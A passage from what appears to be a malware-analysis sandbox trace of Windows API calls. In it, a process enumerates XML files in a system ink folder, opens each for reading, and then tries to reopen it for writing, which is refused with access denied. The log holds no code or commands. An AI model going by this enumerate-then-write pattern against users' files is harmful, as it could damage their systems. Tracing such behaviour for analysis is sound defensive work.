Parameter=0x1086e48, Context=0x0) returned 1 [0099.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.480] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0099.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.481] AreFileApisANSI () returned 1 [0099.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpUsedDefaultChar=0x0) returned 86 [0099.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0099.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.481] AreFileApisANSI () returned 1 [0099.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81358 [0099.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x81358, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 86 [0099.481] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.481] GetFileType (hFile=0x27c) returned 0x1 [0099.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81358 | out: hHeap=0x20000) returned 1 [0099.482] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.482] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.482] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.482] CloseHandle (hObject=0x27c) returned 1 [0099.482] AreFileApisANSI () returned 1 [0099.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81a88 [0099.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x81a88, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 86 [0099.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.482] GetLastError () returned 0x5 [0099.482] GetLastError () returned 0x5 [0099.482] SetLastError (dwErrCode=0x5) [0099.482] GetLastError () returned 0x5 [0099.483] SetLastError (dwErrCode=0x5) [0099.483] GetLastError () returned 0x5 [0099.483] SetLastError (dwErrCode=0x5) [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0099.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.483] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0099.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0099.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.484] AreFileApisANSI () returned 1 [0099.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpUsedDefaultChar=0x0) returned 82 [0099.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.484] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.484] AreFileApisANSI () returned 1 [0099.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60088 [0099.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 82 [0099.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.485] GetFileType (hFile=0x27c) returned 0x1 [0099.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0099.485] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.485] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.485] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.485] CloseHandle (hObject=0x27c) returned 1 [0099.486] AreFileApisANSI () returned 1 [0099.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60088 [0099.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 82 [0099.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.486] GetLastError () returned 0x5 [0099.486] GetLastError () returned 0x5 [0099.486] SetLastError (dwErrCode=0x5) [0099.486] GetLastError () returned 0x5 [0099.486] SetLastError (dwErrCode=0x5) [0099.486] GetLastError () returned 0x5 [0099.486] SetLastError (dwErrCode=0x5) [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.486] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.486] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81e20 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0099.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.487] AreFileApisANSI () returned 1 [0099.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpUsedDefaultChar=0x0) returned 86 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0099.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.487] AreFileApisANSI () returned 1 [0099.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81cb0 [0099.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x81cb0, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 86 [0099.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.488] GetFileType (hFile=0x27c) returned 0x1 [0099.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0099.488] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.488] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.488] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.488] CloseHandle (hObject=0x27c) returned 1 [0099.488] AreFileApisANSI () returned 1 [0099.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0099.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81cb0 [0099.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x81cb0, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 86 [0099.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.489] GetLastError () returned 0x5 [0099.489] GetLastError () returned 0x5 [0099.489] SetLastError (dwErrCode=0x5) [0099.489] GetLastError () returned 0x5 [0099.489] SetLastError (dwErrCode=0x5) [0099.489] GetLastError () returned 0x5 [0099.489] SetLastError (dwErrCode=0x5) [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0099.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 